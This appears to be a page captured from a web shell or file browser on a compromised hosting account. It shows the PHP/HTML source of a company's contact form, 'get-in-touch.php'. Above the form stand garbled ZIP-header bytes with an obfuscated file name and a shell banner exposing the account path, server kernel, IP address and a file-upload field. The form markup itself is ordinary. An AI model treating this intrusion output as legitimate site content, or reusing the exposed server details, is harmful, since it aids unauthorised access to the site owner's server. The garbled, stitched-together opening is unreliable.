PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/ $#$#$#

Dir : /home/distinctdesign/codenwebz.com/includes/
Server: Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
IP: 162.0.232.53
Choose File :

Url:
Dir : /home/distinctdesign/codenwebz.com/includes/get-in-touch.php

<section class="get-in-touch-sec">
        <div class="container">
            <div class="get-in-touch-head">
                <h4>Get In Touch With Us</h4>
                <p>Our helpful support representatives are here for you around the clock, ready to assist with anything you need.</p>
            </div>
            <div class="row">
                <div class="col-lg-3 col-md-4">
                    <div class="lets-talk-box">
                        <h5>Let’s Talk.</h5>
                    </div>
                    <div class="call-us-at-box">
                        <img data-src="images/webp/call-us-img-1.webp" class="lazy img-fluid" alt="">
                        <div class="call-us-content">
                            <p>call us at</p>
                            <a href="<?php echo constant("PHONE_HREF") ?>"><?php echo constant("PHONE") ?></a>
                        </div>
                    </div>
                    <div class="call-us-para">
                        <p>We are available on live chat! Just ping us and we will take care of it all. </p>
                    </div>
                    <div class="call-us-at-box border-none">
                        <img data-src="images/webp/call-us-img-2.webp" class="lazy img-fluid" alt="">
                        <div class="call-us-content">
                            <p>let's chat now</p>
                            <a href="javascript:void(0);" class="chatt">LIVE CHAT</a>
                        </div>
                    </div>
                </div>
                <div class="col-lg-9 col-md-8">
                    <div class="get-in-touch-form-box">
                        <form class="form_submission" id="regForm" method="POST">
                            <input type="hidden" name="url" value='<?php echo (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]"; ?>'>
                            <input type="hidden" name="domain" value="<?php echo $_SERVER['SERVER_NAME']; ?>">
                            <input type="hidden" name="subject" value="footer Form (<?php echo $_SERVER['SERVER_NAME']; ?>)">
                            <div class="row">
                                <div class="col-md-12">
                                    <div class="form-group">
                                        <input type="text" class="form-control" name="cn" placeholder="First Name *"
                                            required="">
                                    </div>
                                </div>
                                <div class="col-md-6">
                                    <div class="form-group">
                                        <input type="number" minlength="10" maxlength="12" pattern="\d{12}"
                                            class="form-control" placeholder="Phone *" name="pn" required="">
                                    </div>
                                </div>
                                <div class="col-md-6">
                                    <div class="form-group">
                                        <input type="text" class="form-control" placeholder="Email Address *"
                                            name="em" required="">
                                        <!-- <input type="text" class="form-control" placeholder="Email Address *" name="email" data-validation="required"> -->
                                    </div>
                                </div>
                                <div class="col-md-12">
                                    <div class="form-group">
                                        <textarea name="msg" id="msg" placeholder="Requirement *"
                                            rows="5"></textarea>
                                    </div>
                                </div>
                                <div class="form-group">
                                    <button type="submit" class="btn btn-submit" id="signupBtn">send now</button>
                                    <div class="error mt-3 alert alert-danger text-left mb-0" style="display: none">
                                    </div>
                                    <div class="success mt-3 alert alert-success text-left mb-0">
                                    </div>
                                    <div class="loader" style="display: none">
                                        <img alt="loader" src="loader.gif">
                                    </div>
                                </div>
                            </div>
                        </form>
                    </div>
                </div>
            </div>
        </div>
    </section>